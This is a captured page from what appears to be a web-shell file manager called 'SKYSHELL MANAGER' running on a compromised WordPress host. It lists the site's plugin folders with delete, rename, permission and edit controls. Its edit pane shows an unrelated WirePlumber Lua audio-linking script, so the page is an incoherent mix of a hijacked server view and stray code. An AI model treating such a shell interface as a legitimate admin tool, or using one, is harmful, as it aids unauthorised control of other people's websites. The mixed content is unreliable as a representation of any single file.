📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
redlightsquared.com
/
wp-content
/
plugins
/
Name
Size
Perm
Actions
📁
adminify
-
0755
🗑️
🏷️
🔒
📁
adminify-activity-logs
-
0755
🗑️
🏷️
🔒
📁
adminify-pro
-
0755
🗑️
🏷️
🔒
📁
akismet
-
0755
🗑️
🏷️
🔒
📁
all-in-one-wp-migration
-
0755
🗑️
🏷️
🔒
📁
all-in-one-wp-migration-unlimited-extension
-
0755
🗑️
🏷️
🔒
📁
authorizenet-payment-gateway-for-woocommerce
-
0755
🗑️
🏷️
🔒
📁
backuply
-
0755
🗑️
🏷️
🔒
📁
backuply-pro
-
0755
🗑️
🏷️
🔒
📁
cf7-conditional-fields
-
0755
🗑️
🏷️
🔒
📁
classic-editor
-
0755
🗑️
🏷️
🔒
📁
code-snippets
-
0755
🗑️
🏷️
🔒
📁
contact-form-7
-
0755
🗑️
🏷️
🔒
📁
cookieadmin
-
0755
🗑️
🏷️
🔒
📁
cookieadmin-pro
-
0755
🗑️
🏷️
🔒
📁
crisp
-
0755
🗑️
🏷️
🔒
📁
duplicate-page
-
0755
🗑️
🏷️
🔒
📁
duplicator
-
0755
🗑️
🏷️
🔒
📁
export-media-with-selected-content
-
0755
🗑️
🏷️
🔒
📁
google-listings-and-ads
-
0755
🗑️
🏷️
🔒
📁
google-site-kit
-
0755
🗑️
🏷️
🔒
📁
gosmtp
-
0755
🗑️
🏷️
🔒
📁
gosmtp-pro
-
0755
🗑️
🏷️
🔒
📁
header-footer
-
0755
🗑️
🏷️
🔒
📁
litespeed-cache
-
0755
🗑️
🏷️
🔒
📁
loginizer
-
0755
🗑️
🏷️
🔒
📁
loginizer-security
-
0755
🗑️
🏷️
🔒
📁
loginpress
-
0755
🗑️
🏷️
🔒
📁
masterslider
-
0755
🗑️
🏷️
🔒
📁
oxygen
-
0755
🗑️
🏷️
🔒
📁
oxygen-gutenberg
-
0755
🗑️
🏷️
🔒
📁
oxygen-woocommerce
-
0755
🗑️
🏷️
🔒
📁
pagelayer
-
0755
🗑️
🏷️
🔒
📁
pagelayer-pro
-
0755
🗑️
🏷️
🔒
📁
pdf-embedder
-
0755
🗑️
🏷️
🔒
📁
rolemaster-suite
-
0755
🗑️
🏷️
🔒
📁
siteseo
-
0755
🗑️
🏷️
🔒
📁
siteseo-pro
-
0755
🗑️
🏷️
🔒
📁
speedycache
-
0755
🗑️
🏷️
🔒
📁
speedycache-pro
-
0755
🗑️
🏷️
🔒
📁
wc-external-product-new-tab
-
0755
🗑️
🏷️
🔒
📁
woocommerce
-
0755
🗑️
🏷️
🔒
📁
wordpress-seo
-
0755
🗑️
🏷️
🔒
📁
wp-headers-and-footers
-
0755
🗑️
🏷️
🔒
📄
error_log
2337 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
login.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: find-defined-target.lua
-- WirePlumber -- -- Copyright © 2022 Collabora Ltd. -- -- SPDX-License-Identifier: MIT -- -- Check if the target node is defined explicitly. -- This definition can be done in two ways. -- 1. "node.target"/"target.object" in the node properties -- 2. "target.node"/"target.object" in the default metadata lutils = require ("linking-utils") cutils = require ("common-utils") log = Log.open_topic ("s-linking") SimpleEventHook { name = "linking/find-defined-target", before = "linking/prepare-link", interests = { EventInterest { Constraint { "event.type", "=", "select-target" }, }, }, execute = function (event) local source, om, si, si_props, si_flags, target = lutils:unwrap_select_target_event (event) -- bypass the hook if the target is already picked up if target then return end log:info (si, string.format ("handling item %d: %s (%s)", si.id, tostring (si_props ["node.name"]), tostring (si_props ["node.id"]))) local metadata = Settings.get_boolean ("linking.allow-moving-streams") and cutils.get_default_metadata_object () local dont_fallback = cutils.parseBool (si_props ["node.dont-fallback"]) local dont_move = cutils.parseBool (si_props ["node.dont-move"]) local target_key local target_value = nil local node_defined = false local target_picked = nil if si_props ["target.object"] ~= nil then target_value = si_props ["target.object"] target_key = "object.serial" node_defined = true elseif si_props ["node.target"] ~= nil then target_value = si_props ["node.target"] target_key = "node.id" node_defined = true end if metadata and not dont_move then local id = metadata:find (si_props ["node.id"], "target.object") if id ~= nil then target_value = id target_key = "object.serial" node_defined = false else id = metadata:find (si_props ["node.id"], "target.node") if id ~= nil then target_value = id target_key = "node.id" node_defined = false end end end if target_value == "-1" then target_picked = false target = nil elseif target_value and tonumber (target_value) then target = om:lookup { type = "SiLinkable", Constraint { target_key, "=", target_value }, } if target and lutils.canLink (si_props, target) then target_picked = true end elseif target_value then for lnkbl in om:iterate { type = "SiLinkable" } do local target_props = lnkbl.properties if (target_props ["node.name"] == target_value or target_props ["object.path"] == target_value) and target_props ["item.node.direction"] == cutils.getTargetDirection (si_props) and lutils.canLink (si_props, lnkbl) then target_picked = true target = lnkbl break end end end local can_passthrough, passthrough_compatible if target then passthrough_compatible, can_passthrough = lutils.checkPassthroughCompatibility (si, target) if not passthrough_compatible then target = nil end end si_flags.has_defined_target = false if target_picked and target then log:info (si, string.format ("... defined target picked: %s (%s), can_passthrough:%s", tostring (target.properties ["node.name"]), tostring (target.properties ["node.id"]), tostring (can_passthrough))) si_flags.has_node_defined_target = node_defined si_flags.can_passthrough = can_passthrough si_flags.has_defined_target = true event:set_data ("target", target) elseif target_value and dont_fallback then -- send error to client and destroy node if linger is not set local linger = cutils.parseBool (si_props ["node.linger"]) if not linger then local node = si:get_associated_proxy ("node") lutils.sendClientError (event, node, -2, "defined target not found") node:request_destroy () log:info(si, "... destroyed node as defined target was not found") else log:info(si, "... waiting for defined target as dont-fallback is set") end event:stop_processing () end end }:register ()
Save